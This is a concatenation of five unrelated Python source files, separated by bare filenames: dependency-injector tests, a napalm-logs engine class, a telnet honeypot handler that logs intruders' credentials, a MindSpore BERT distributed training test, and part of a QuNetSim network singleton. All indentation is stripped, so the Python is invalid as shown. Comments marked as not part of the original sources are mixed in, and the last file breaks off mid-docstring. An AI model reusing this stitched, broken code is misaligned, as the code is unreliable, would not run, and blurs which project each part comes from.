# File "/ve/injector/injector.py", line 851, in call_with_injection
# **dependencies)
# File "/ve/injector/injector_test_py3.py", line 189, in __init__
# assert not kwargs
# AssertionError: assert not {'args': 0, 'kwargs': ''}
injector.get(A)
def test_forward_references_in_annotations_are_handled():
# See https://www.python.org/dev/peps/pep-0484/#forward-references for details
class CustomModule(Module):
@provider
def provide_x(self) -> 'X':
return X('hello')
@inject
def fun(s: 'X') -> 'X':
return s
# The class needs to be module-global in order for the string -> object
# resolution mechanism to work. I could make it work with locals but it
# doesn't seem worth it.
global X
class X:
def __init__(self, message: str) -> None:
self.message = message
try:
injector = Injector(CustomModule)
assert injector.call_with_injection(fun).message == 'hello'
finally:
del X
def test_more_useful_exception_is_raised_when_parameters_type_is_any():
@inject
def fun(a: Any) -> None:
pass
injector = Injector()
# This was the exception before:
#
# TypeError: Cannot instantiate <class 'typing.AnyMeta'>
#
# Now:
#
# injector.CallError: Call to AnyMeta.__new__() failed: Cannot instantiate
# <class 'typing.AnyMeta'> (injection stack: ['injector_test_py3'])
#
# In this case the injection stack doesn't provide too much information but
# it quickly gets helpful when the stack gets deeper.
with pytest.raises((CallError, TypeError)):
injector.call_with_injection(fun)
def test_optionals_are_ignored_for_now():
@inject
def fun(s: str = None):
return s
assert Injector().call_with_injection(fun) == ''
def test_explicitly_passed_parameters_override_injectable_values():
# The class needs to be defined globally for the 'X' forward reference to be able to be resolved.
global X
# We test a method on top of regular function to exercise the code path that's
# responsible for handling methods.
class X:
@inject
def method(self, s: str) -> str:
return s
@inject
def method_typed_self(self: 'X', s: str) -> str:
return s
@inject
def function(s: str) -> str:
return s
injection_counter = 0
def provide_str() -> str:
nonlocal injection_counter
injection_counter += 1
return 'injected string'
def configure(binder: Binder) -> None:
binder.bind(str, to=provide_str)
injector = Injector([configure])
x = X()
try:
assert injection_counter == 0
assert injector.call_with_injection(x.method) == 'injected string'
assert injection_counter == 1
assert injector.call_with_injection(x.method_typed_self) == 'injected string'
assert injection_counter == 2
assert injector.call_with_injection(function) == 'injected string'
assert injection_counter == 3
assert injector.call_with_injection(x.method, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(x.method_typed_self, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(function, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(x.method, kwargs={'s': 'passed string'}) == 'passed string'
assert injection_counter == 3
assert (
injector.call_with_injection(x.method_typed_self, kwargs={'s': 'passed string'})
== 'passed string'
)
assert injection_counter == 3
assert injector.call_with_injection(function, kwargs={'s': 'passed string'}) == 'passed string'
assert injection_counter == 3
finally:
del X
class AssistedB:
@inject
def __init__(self, a: EmptyClass, b: str):
self.a = a
self.b = b
def test_class_assisted_builder_of_partially_injected_class():
class C:
@inject
def __init__(self, a: EmptyClass, builder: ClassAssistedBuilder[AssistedB]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, AssistedB)
assert isinstance(c.b.a, EmptyClass)
# The test taken from Alec Thomas' pull request: https://github.com/alecthomas/injector/pull/73
def test_child_scope():
TestKey = NewType('TestKey', str)
TestKey2 = NewType('TestKey2', str)
def parent_module(binder):
binder.bind(TestKey, to='in parent', scope=singleton)
def first_child_module(binder):
binder.bind(TestKey2, to='in first child', scope=singleton)
def second_child_module(binder):
binder.bind(TestKey2, to='in second child', scope=singleton)
injector = Injector(modules=[parent_module])
first_child_injector = injector.create_child_injector(modules=[first_child_module])
second_child_injector = injector.create_child_injector(modules=[second_child_module])
assert first_child_injector.get(TestKey) is first_child_injector.get(TestKey)
assert first_child_injector.get(TestKey) is second_child_injector.get(TestKey)
assert first_child_injector.get(TestKey2) is not second_child_injector.get(TestKey2)
def test_custom_scopes_work_as_expected_with_child_injectors():
class CustomSingletonScope(SingletonScope):
pass
custom_singleton = ScopeDecorator(CustomSingletonScope)
def parent_module(binder):
binder.bind(str, to='parent value', scope=custom_singleton)
def child_module(binder):
binder.bind(str, to='child value', scope=custom_singleton)
parent = Injector(modules=[parent_module])
child = parent.create_child_injector(modules=[child_module])
print('parent, child: %s, %s' % (parent, child))
assert parent.get(str) == 'parent value'
assert child.get(str) == 'child value'
# Test for https://github.com/alecthomas/injector/issues/75
def test_inject_decorator_does_not_break_manual_construction_of_pyqt_objects():
class PyQtFake:
@inject
def __init__(self):
pass
def __getattribute__(self, item):
if item == '__injector__':
raise RuntimeError(
'A PyQt class would raise this exception if getting '
'self.__injector__ before __init__ is called and '
'self.__injector__ has not been set by Injector.'
)
return object.__getattribute__(self, item)
instance = PyQtFake() # This used to raise the exception
assert isinstance(instance, PyQtFake)
def test_using_an_assisted_builder_with_a_provider_raises_an_injector_error():
class MyModule(Module):
@provider
def provide_a(self, builder: AssistedBuilder[EmptyClass]) -> EmptyClass:
return builder.build()
injector = Injector(MyModule)
with pytest.raises(Error):
injector.get(EmptyClass)
def test_newtype_integration_works():
UserID = NewType('UserID', int)
def configure(binder):
binder.bind(UserID, to=123)
injector = Injector([configure])
assert injector.get(UserID) == 123
@pytest.mark.skipif(sys.version_info < (3, 6), reason="Requires Python 3.6+")
def test_dataclass_integration_works():
import dataclasses
# Python 3.6+-only syntax below
exec(
"""
@inject
@dataclasses.dataclass
class Data:
name: str
""",
locals(),
globals(),
)
def configure(binder):
binder.bind(str, to='data')
injector = Injector([configure])
assert injector.get(Data).name == 'data'
def test_get_bindings():
def function1(a: int) -> None:
pass
assert get_bindings(function1) == {}
@inject
def function2(a: int) -> None:
pass
assert get_bindings(function2) == {'a': int}
@inject
@noninjectable('b')
def function3(a: int, b: str) -> None:
pass
assert get_bindings(function3) == {'a': int}
# Let's verify that the inject/noninjectable ordering doesn't matter
@noninjectable('b')
@inject
def function3b(a: int, b: str) -> None:
pass
assert get_bindings(function3b) == {'a': int}
if HAVE_ANNOTATED:
# The simple case of no @inject but injection requested with Inject[...]
def function4(a: Inject[int], b: str) -> None:
pass
assert get_bindings(function4) == {'a': int}
# Using @inject with Inject is redundant but it should not break anything
@inject
def function5(a: Inject[int], b: str) -> None:
pass
assert get_bindings(function5) == {'a': int, 'b': str}
# We need to be able to exclude a parameter from injection with NoInject
@inject
def function6(a: int, b: NoInject[str]) -> None:
pass
assert get_bindings(function6) == {'a': int}
# The presence of NoInject should not trigger anything on its own
def function7(a: int, b: NoInject[str]) -> None:
pass
assert get_bindings(function7) == {}
# There was a bug where in case of multiple NoInject-decorated parameters only the first one was
# actually made noninjectable and we tried to inject something we couldn't possibly provide
# into the second one.
@inject
def function8(a: NoInject[int], b: NoInject[int]) -> None:
pass
assert get_bindings(function8) == {}
|
base.py
|
# -*- coding: utf-8 -*-
'''
napalm-logs base
'''
from __future__ import absolute_import
from __future__ import unicode_literals
# Import std lib
import os
import yaml
import time
import socket
import logging
from multiprocessing import Process, Pipe
# Import napalm-logs pkgs
import napalm_logs.exceptions
from napalm_logs.transport import get_transport
from napalm_logs.device import NapalmLogsDeviceProc
from napalm_logs.server import NapalmLogsServerProc
from napalm_logs.listener import NapalmLogsListenerProc
log = logging.getLogger(__name__)
class NapalmLogs:
def __init__(self,
hostname='0.0.0.0',
port=514,
transport='zmq',
publish_hostname='0.0.0.0',
publish_port=49017,
config_path=None,
config_dict=None,
extension_config_path=None,
extension_config_dict=None,
log_level='warning',
log_fmt='%(asctime)s,%(msecs)03.0f [%(name)-17s][%(levelname)-8s] %(message)s'):
'''
Init the napalm-logs engine.
:param hostname: The address to bind the syslog client. Default: 0.0.0.0.
:param port: Listen port. Default: 514.
        :param publish_hostname: The address to bind when publishing the OC
objects. Default: 0.0.0.0.
:param publish_port: Publish port. Default: 49017.
'''
self.hostname = hostname
self.port = port
self.publish_hostname = publish_hostname
self.publish_port = publish_port
self.config_path = config_path
self.config_dict = config_dict
self._transport_type = transport
self.extension_config_path = extension_config_path
self.extension_config_dict = extension_config_dict
self.log_level = log_level
self.log_fmt = log_fmt
# Setup the environment
self._setup_log()
self._setup_transport()
self._build_config()
self._precompile_regex()
# Private vars
self.__os_proc_map = {}
def __exit__(self, exc_type, exc_value, exc_traceback):
self.stop_engine()
if exc_type is not None:
log.error('Exiting due to unhandled exception', exc_info=True)
self.__raise_clean_exception(exc_type, exc_value, exc_traceback)
def __del__(self):
self.stop_engine()
def _setup_log(self):
'''
Setup the log object.
'''
logging_level = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}.get(self.log_level.lower())
logging.basicConfig(format=self.log_fmt,
level=logging_level)
def _setup_transport(self):
'''
Setup the transport.
'''
transport_class = get_transport(self._transport_type)
self.transport = transport_class(self.publish_hostname,
self.publish_port)
def _load_config(self, path):
'''
Read the configuration under a specific path
and return the object.
'''
config = {}
if not os.path.isdir(path):
msg = (
'Unable to read from {path}: '
'the directory does not exist!'
).format(path=path)
log.error(msg)
raise IOError(msg)
files = os.listdir(path)
# Read all files under the config dir
for file in files:
# And allow only .yml and .yaml extensions
if not file.endswith('.yml') and not file.endswith('.yaml'):
continue
            filename = file.split('.')[0]
# The filename is also the network OS name
filepath = os.path.join(path, file)
try:
with open(filepath, 'r') as fstream:
                    config[filename] = yaml.safe_load(fstream)
except yaml.YAMLError as yamlexc:
log.error('Invalid YAML file: {}'.format(filepath), exc_info=True)
raise IOError(yamlexc)
if not config:
msg = 'Unable to find proper configuration files under {path}'.format(path=path)
log.error(msg)
raise IOError(msg)
return config
def _build_config(self):
'''
Build the config of the napalm syslog parser.
'''
if not self.config_dict:
if not self.config_path:
# No custom config path requested
# Read the native config files
self.config_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'config'
)
log.info('Reading the configuration from {path}'.format(path=self.config_path))
self.config_dict = self._load_config(self.config_path)
if not self.extension_config_dict and self.extension_config_path:
# When extension config is not sent as dict
# But `extension_config_path` is specified
log.info('Reading extension configuration from {path}'.format(path=self.extension_config_path))
self.extension_config_dict = self._load_config(self.extension_config_path)
elif not self.extension_config_dict:
self.extension_config_dict = {}
if not self.extension_config_dict:
# No extension config, no extra build
return
for nos, nos_config in self.extension_config_dict.items():
if nos not in self.config_dict and nos_config:
self.config_dict[nos] = nos_config
continue
self.config_dict[nos].update(nos_config)
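        # Merge semantics of the loop above, illustrated (comment only, added for clarity):
        #   config_dict           = {'junos': {'a': 1}}
        #   extension_config_dict = {'junos': {'b': 2}, 'iosxr': {'c': 3}}
        #   -> config_dict == {'junos': {'a': 1, 'b': 2}, 'iosxr': {'c': 3}}
        # Note the update is shallow: nested keys of an existing OS entry are replaced, not deep-merged.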
def _precompile_regex(self):
'''
Go through the configuration and precompile all regular expressions,
so the parsing should be faster.
'''
pass
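        # Possible shape of this step (an assumption, not the project's actual
        # implementation): walk self.config_dict once and replace raw pattern strings
        # with compiled regex objects so per-message matching in the child processes
        # is cheaper. Key names below are hypothetical:
        #
        #   import re
        #   for device_os, os_config in self.config_dict.items():
        #       for msg in os_config.get('messages', []):
        #           msg['line'] = re.compile(msg['line'])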
def start_engine(self):
'''
Start the child processes (one per device OS),
open the socket to start receiving messages.
'''
# TODO prepare the binding to be able to listen to syslog messages
skt = None
# TODO
log.info('Preparing the transport')
self.transport.start()
log.info('Starting child processes for each device type')
os_pipe_map = {}
for device_os, device_config in self.config_dict.items():
child_pipe, parent_pipe = Pipe(duplex=False)
log.debug('Initialized pipe for {dos}'.format(dos=device_os))
log.debug('Parent handle is {phandle} ({phash})'.format(phandle=str(parent_pipe),
phash=hash(parent_pipe)))
log.debug('Child handle is {chandle} ({chash})'.format(chandle=str(child_pipe),
chash=hash(child_pipe)))
log.info('Starting the child process for {dos}'.format(dos=device_os))
dos = NapalmLogsDeviceProc(device_os,
device_config,
self.transport,
child_pipe)
os_pipe_map[device_os] = parent_pipe
os_proc = Process(target=dos.start)
os_proc.start()
log.debug('Started process {pname} for {dos}, having PID {pid}'.format(
pname=os_proc._name,
dos=device_os,
pid=os_proc.pid
)
)
self.__os_proc_map[device_os] = os_proc
log.debug('Setting up the syslog pipe')
serve_pipe, listen_pipe = Pipe(duplex=False)
log.debug('Starting the server process')
server = NapalmLogsServerProc(serve_pipe,
os_pipe_map,
self.config_dict)
self.pserve = Process(target=server.start)
self.pserve.start()
log.debug('Started server process as {pname} with PID {pid}'.format(
pname=self.pserve._name,
pid=self.pserve.pid
)
)
log.debug('Starting the listener process')
listener = NapalmLogsListenerProc(skt, # Socket object
listen_pipe)
self.plisten = Process(target=listener.start)
self.plisten.start()
log.debug('Started listener process as {pname} with PID {pid}'.format(
pname=self.plisten._name,
pid=self.plisten.pid
)
)
def stop_engine(self):
log.info('Shutting down the engine')
if hasattr(self, 'transport'):
self.transport.tear_down()
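# Hedged usage sketch (not part of the original napalm-logs sources): it exercises only
# the public methods defined above; the port and log level are arbitrary example values.
if __name__ == '__main__':
    engine = NapalmLogs(port=5514, log_level='info')
    try:
        engine.start_engine()
        time.sleep(60)  # let the listener, server and per-OS device processes run for a while
    finally:
        engine.stop_engine()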
|
telnet.py
|
import socketserver
import threading
from hpotter import tables
from hpotter.tables import CREDS_LENGTH
from hpotter import logger
from hpotter.env import logger, write_db, telnet_server
from hpotter.docker_shell.shell import fake_shell, get_string
# https://docs.python.org/3/library/socketserver.html
class TelnetHandler(socketserver.BaseRequestHandler):
def creds(self, prompt):
logger.debug('Getting creds')
tries = 0
response = ''
while response == '':
self.request.sendall(prompt)
logger.debug('Before creds get_string')
response = get_string(self.request, limit=CREDS_LENGTH, telnet=True)
tries += 1
if tries > 2:
logger.debug('Creds no response')
raise IOError('no response')
logger.debug('Creds returning %s', response)
return response
def handle(self):
self.request.settimeout(30)
connection = tables.Connections(
sourceIP=self.client_address[0],
sourcePort=self.client_address[1],
destIP=self.server.socket.getsockname()[0],
destPort=self.server.socket.getsockname()[1],
proto=tables.TCP)
write_db(connection)
try:
username = self.creds(b'Username: ')
password = self.creds(b'Password: ')
except Exception as exception:
logger.debug(exception)
self.request.close()
return
logger.debug('After creds')
creds = tables.Credentials(username=username, password=password, \
connection=connection)
write_db(creds)
self.request.sendall(b'Last login: Mon Nov 20 12:41:05 2017 from 8.8.8.8\n')
        # Conventionally root/admin get the '#' prompt and unprivileged users get '$'.
        prompt = b'\n#: ' if username in ('root', 'admin') else b'\n$: '
try:
fake_shell(self.request, connection, prompt, telnet=True)
except Exception as exc:
logger.debug(type(exc))
logger.debug(exc)
logger.debug('telnet fake_shell threw exception')
self.request.close()
logger.debug('telnet handle finished')
class TelnetServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass
def start_server():
global telnet_server
telnet_handler = TelnetHandler
telnet_server = TelnetServer(('0.0.0.0', 23), telnet_handler)
threading.Thread(target=telnet_server.serve_forever).start()
def stop_server():
if telnet_server:
telnet_server.shutdown()
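# Hedged usage sketch (not part of the original hpotter sources): the module is driven
# through start_server()/stop_server(); the ThreadingMixIn server spawns one TelnetHandler
# per incoming connection on port 23.
#
#   start_server()
#   # connect with a telnet client to exercise the fake shell, then:
#   stop_server()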
|
test_bert_thor_mlperf.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
import time
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.dataset as dataset
import mindspore.common.dtype as mstype
import mindspore.communication.management as D
from mindspore import context
from mindspore import log as logger
from mindspore.train.callback import Callback
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
import mindspore.dataset.engine.datasets as de
import mindspore.dataset.transforms.c_transforms as C
from model_zoo.official.nlp.bert_thor.src.bert_for_pre_training import BertNetworkWithLoss, BertTrainOneStepCell
from model_zoo.official.nlp.bert_thor.src.bert_net_config import bert_net_cfg
from model_zoo.official.nlp.bert_thor.src.config import cfg
from model_zoo.official.nlp.bert_thor.src.lr_generator import get_bert_lr, get_bert_damping
from model_zoo.official.nlp.bert_thor.src.model_thor import Model
from model_zoo.official.nlp.bert_thor.src.thor_for_bert_arg import THOR
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
DATASET_PATH = "/home/workspace/mindspore_dataset/bert/thor/en-wiki-512_test_first1wan"
load_checkpoint_path = ""
data_sink_steps = 100
train_steps = 200
batch_size = 12
np.random.seed(1)
dataset.config.set_seed(1)
os.environ['GLOG_v'] = str(2)
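# Derived from the constants above (added for clarity): each data-sink call consumes
# data_sink_steps * batch_size = 100 * 12 = 1200 samples per device, and
# train_steps // data_sink_steps = 2 sink epochs are run (new_repeat_count is capped
# to that value in train_process_bert_thor below).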
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
self.epoch_mseconds_list = []
self.per_step_mseconds_list = []
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
cb_params = run_context.original_args()
epoch_mseconds = (time.time() - self.epoch_time) * 1000
self.epoch_mseconds_list.append(epoch_mseconds)
per_step_mseconds = epoch_mseconds / self.data_size
self.per_step_mseconds_list.append(per_step_mseconds)
print("epoch: {}, per_step_mseconds are {}".format(cb_params.cur_epoch_num, str(per_step_mseconds)), flush=True)
class LossCallback(Callback):
def __init__(self):
super(LossCallback, self).__init__()
self.loss_list = []
def epoch_end(self, run_context):
cb_params = run_context.original_args()
self.loss_list.append(cb_params.net_outputs.asnumpy())
print("epoch: {}, step: {}, outputs are {}".format(cb_params.cur_epoch_num, cb_params.cur_step_num,
str(cb_params.net_outputs)), flush=True)
def create_bert_dataset(device_num=1, rank=0, do_shuffle="true", data_dir=None, schema_dir=None):
"""create train dataset"""
# apply repeat operations
files = os.listdir(data_dir)
data_files = []
for file_name in files:
if "tfrecord" in file_name:
data_files.append(os.path.join(data_dir, file_name))
data_files = sorted(data_files)
ds = de.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None,
columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels",
"masked_lm_positions", "masked_lm_ids", "masked_lm_weights"],
shuffle=de.Shuffle.FILES if do_shuffle == "true" else False,
num_shards=device_num, shard_id=rank, shard_equal_rows=True)
ori_dataset_size = ds.get_dataset_size()
print('origin dataset size: ', ori_dataset_size)
type_cast_op = C.TypeCast(mstype.int32)
ds = ds.map(operations=type_cast_op, input_columns="masked_lm_ids")
ds = ds.map(operations=type_cast_op, input_columns="masked_lm_positions")
ds = ds.map(operations=type_cast_op, input_columns="next_sentence_labels")
ds = ds.map(operations=type_cast_op, input_columns="segment_ids")
ds = ds.map(operations=type_cast_op, input_columns="input_mask")
ds = ds.map(operations=type_cast_op, input_columns="input_ids")
# apply batch operations
ds = ds.batch(batch_size, drop_remainder=True)
logger.info("data size: {}".format(ds.get_dataset_size()))
logger.info("repeat count: {}".format(ds.get_repeat_count()))
return ds
def _set_bert_all_reduce_split():
"""set bert all_reduce fusion split, support num_hidden_layers is 12 and 24."""
from mindspore.parallel._auto_parallel_context import auto_parallel_context
if bert_net_cfg.num_hidden_layers == 12:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum3")
elif bert_net_cfg.num_hidden_layers == 24:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum3")
def train_process_bert_thor(q, device_id, epoch_size, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", device_id=device_id, save_graphs=False)
context.set_context(reserve_class_name_in_scope=False)
context.set_context(max_call_depth=3000)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
rank = device_id % device_num
context.reset_auto_parallel_context()
_set_bert_all_reduce_split()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
device_num=device_num)
bert_net_cfg.num_hidden_layers = 4
ds = create_bert_dataset(device_num=device_num, rank=rank, do_shuffle=False, data_dir=DATASET_PATH, schema_dir=None)
net_with_loss = BertNetworkWithLoss(bert_net_cfg, True)
new_repeat_count = epoch_size * ds.get_dataset_size() // data_sink_steps
new_repeat_count = min(new_repeat_count, train_steps // data_sink_steps)
lr = get_bert_lr()
damping = get_bert_damping()
optimizer = THOR(filter(lambda x: x.requires_grad, net_with_loss.get_parameters()), lr, cfg.Thor.momentum,
filter(lambda x: 'matrix_A' in x.name, net_with_loss.get_parameters()),
filter(lambda x: 'matrix_G' in x.name, net_with_loss.get_parameters()),
cfg.Thor.weight_decay, cfg.Thor.loss_scale, bert_net_cfg.num_hidden_layers,
bert_net_cfg.batch_size, damping)
time_monitor_callback = TimeMonitor(data_sink_steps)
loss_callback = LossCallback()
callback = [time_monitor_callback, loss_callback]
if load_checkpoint_path:
param_dict = load_checkpoint(load_checkpoint_path)
load_param_into_net(net_with_loss, param_dict)
net_with_grads = BertTrainOneStepCell(net_with_loss, optimizer=optimizer)
model = Model(net_with_grads, frequency=cfg.Thor.frequency)
model.train(new_repeat_count, ds, callbacks=callback, dataset_sink_mode=True, sink_size=data_sink_steps)
loss_list = loss_callback.loss_list
per_step_mseconds = time_monitor_callback.per_step_mseconds_list
q.put({'loss': loss_list, 'cost': per_step_mseconds})
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_bert_thor_mlperf_8p():
"""test bert thor mlperf 8p"""
q = Queue()
device_num = 8
epoch_size = 2
process = []
for i in range(device_num):
device_id = i
process.append(Process(target=train_process_bert_thor, args=(q, device_id, epoch_size, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
sum_loss_list = []
sum_cost_list = []
for _ in range(train_steps // data_sink_steps):
sum_loss_list.append(0.0)
sum_cost_list.append(0.0)
for _ in range(device_num):
output = q.get()
loss_list = output['loss']
cost_list = output['cost']
sum_loss_list = np.sum([loss_list, sum_loss_list], axis=0)
sum_cost_list = np.sum([cost_list, sum_cost_list], axis=0)
for j in range(train_steps // data_sink_steps):
print("epoch: ", j, "sum_loss: ", sum_loss_list[j], "sum_cost: ", sum_cost_list[j])
mean_loss = sum_loss_list[-1] / device_num
mean_cost = sum_cost_list[-1] / device_num
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
assert mean_cost < 64.2
assert mean_loss < 7.9
if __name__ == '__main__':
test_bert_thor_mlperf_8p()
|
network.py
|
import random
import time
from inspect import signature
from queue import Queue
import matplotlib.pyplot as plt
import networkx as nx
from qunetsim.backends import EQSNBackend
from qunetsim.objects import Qubit, RoutingPacket, Logger, DaemonThread
from qunetsim.utils.constants import Constants
# Network singleton
class Network:
""" A network control singleton object. """
__instance = None
@staticmethod
def get_instance():
if Network.__instance is None:
Network()
return Network.__instance
@staticmethod
def reset_network():
if Network.__instance is not None:
Network.__instance.stop(True)
Network.__instance = None
__instance = Network()
def __init__(self):
if Network.__instance is None:
self.ARP = {}
# The directed graph for the connections
self.classical_network = nx.DiGraph()
self.quantum_network = nx.DiGraph()
self._quantum_routing_algo = nx.shortest_path
self._classical_routing_algo = nx.shortest_path
self._use_hop_by_hop = True
self._packet_queue = Queue()
self._stop_thread = False
self._use_ent_swap = False
self._queue_processor_thread = None
self._delay = 0.1
self._packet_drop_rate = 0
self._backend = None
Network.__instance = self
else:
raise Exception('this is a singleton class')
@property
def use_ent_swap(self):
return self._use_ent_swap
@use_ent_swap.setter
def use_ent_swap(self, use_ent_swap):
self._use_ent_swap = use_ent_swap
@property
def use_hop_by_hop(self):
"""
Get the routing style for the network.
Returns:
If the network uses hop by hop routing.
"""
return self._use_hop_by_hop
@use_hop_by_hop.setter
def use_hop_by_hop(self, should_use):
"""
Set the routing style for the network.
Args:
should_use (bool): If the network should use hop by hop routing or not
"""
if not isinstance(should_use, bool):
raise Exception('use_hop_by_hop should be a boolean value.')
self._use_hop_by_hop = should_use
@property
def classical_routing_algo(self):
"""
Get the routing algorithm for the network.
"""
return self._classical_routing_algo
@classical_routing_algo.setter
def classical_routing_algo(self, algorithm):
"""
Set the routing algorithm for the network.
Args:
algorithm (function): The routing function. Should return a list of host_ids which represents the route
"""
self._classical_routing_algo = algorithm
@property
def quantum_routing_algo(self):
"""
Gets the quantum routing algorithm of the network.
Returns:
algorithm (function): The quantum routing algorithm of the network
"""
return self._quantum_routing_algo
@quantum_routing_algo.setter
def quantum_routing_algo(self, algorithm):
"""
Sets the quantum routing algorithm of the network.
Args:
            algorithm (function): The routing algorithm of the network. Should take the (nx) graph
                representation of the network, the sender address and the receiver address, and return a route.
"""
if not callable(algorithm):
raise Exception("The quantum routing algorithm must be a function.")
num_algo_params = len(signature(algorithm).parameters)
if num_algo_params != 3:
raise Exception("The quantum routing algorithm function should take three parameters: " +
"the (nx) graph representation of the network, the sender address and the " +
"receiver address.")
self._quantum_routing_algo = algorithm
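    # Example of a custom routing function satisfying the three-parameter contract
    # enforced above (a sketch, not part of the original QuNetSim code):
    #
    #   def dijkstra_route(graph, source, dest):
    #       return nx.dijkstra_path(graph, source, dest)
    #
    #   Network.get_instance().quantum_routing_algo = dijkstra_route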
@property
def delay(self):
"""
Get the delay interval of the network.
"""
return self._delay
@delay.setter
def delay(self, delay):
"""
Set the delay interval of the network.
Args:
delay (float): Delay in network tick in seconds
"""
if not (isinstance(delay, int) or isinstance(delay, float)):
raise Exception('delay should be a number')
if delay < 0:
raise Exception('Delay should not be negative')
self._delay = delay
@property
def packet_drop_rate(self):
"""
Get the drop rate of the network.
"""
return self._packet_drop_rate
@packet_drop_rate.setter
def packet_drop_rate(self, drop_rate):
"""
Set the drop rate of the network.
Args:
drop_rate (float): Probability of dropping a packet in the network
"""
        if not (isinstance(drop_rate, int) or isinstance(drop_rate, float)):
            raise Exception('Packet drop rate should be a number')
        if drop_rate < 0 or drop_rate > 1:
            raise Exception('Packet drop rate should be between 0 and 1')
self._packet_drop_rate = drop_rate
@property
def arp(self):
return self.ARP
@property
def num_hosts(self):
return len(self.arp.keys())
def add_host(self, host):
"""
Adds the *host* to ARP table and updates the network graph.
Args:
host (Host): The host to be added to the network.
"""
Logger.get_instance().debug('host added: ' + host.host_id)
self.ARP[host.host_id] = host
self._update_network_graph(host)
def add_hosts(self, hosts):
"""
Adds the *hosts* to ARP table and updates the network graph.
Args:
hosts (list): The hosts to be added to the network.
"""
for host in hosts:
self.add_host(host)
def remove_host(self, host):
"""
Removes the host from the network.
Args:
host (Host): The host to be removed from the network.
"""
if host.host_id in self.ARP:
del self.ARP[host.host_id]
if self.quantum_network.has_node(host.host_id):
self.quantum_network.remove_node(host.host_id)
if self.classical_network.has_node(host.host_id):
self.classical_network.remove_node(host.host_id)
def remove_c_connection(self, sender, receiver):
if self.classical_network.has_edge(sender, receiver):
self.classical_network.remove_edge(sender, receiver)
def remove_q_connection(self, sender, receiver):
if self.quantum_network.has_edge(sender, receiver):
self.quantum_network.remove_edge(sender, receiver)
def remove_hosts(self, hosts):
for host in hosts:
self.remove_host(host)
def update_host(self, host):
"""
Update the connections of a host in the network.
        Args:
            host (Host): The host whose connections should be refreshed.
"""
self.remove_host(host)
self.add_host(host)
def _remove_network_node(self, host):
"""
Removes the host from the ARP table.
Args:
host (Host): The host to be removed from the network.
"""
try:
self.classical_network.remove_node(host.host_id)
except nx.NetworkXError:
            Logger.get_instance().error('attempted to remove a non-existing node from the network')
def _update_network_graph(self, host):
"""
Add host *host* to the network and update the graph representation of the network
Args:
host: The host to be added
"""
if not self.classical_network.has_node(host.host_id):
self.classical_network.add_node(host.host_id)
if not self.quantum_network.has_node(host.host_id):
self.quantum_network.add_node(host.host_id)
for connection in host.classical_connections:
if not self.classical_network.has_edge(host.host_id, connection):
edge = (host.host_id, connection, {'weight': 1})
self.classical_network.add_edges_from([edge])
for connection in host.quantum_connections:
if not self.quantum_network.has_edge(host.host_id, connection):
edge = (host.host_id, connection, {'weight': 1})
self.quantum_network.add_edges_from([edge])
def shares_epr(self, sender, receiver):
"""
        Returns a boolean indicating whether the sender and receiver share an EPR pair.
Args:
receiver (Host): The receiver
sender (Host): The sender
Returns:
(bool) whether the sender and receiver share an EPR pair.
"""
host_sender = self.get_host(sender)
host_receiver = self.get_host(receiver)
return host_sender.shares_epr(receiver) and host_receiver.shares_epr(sender)
def get_host(self, host_id):
"""
Returns the host with the *host_id*.
Args:
host_id (str): ID number of the host that is returned.
Returns:
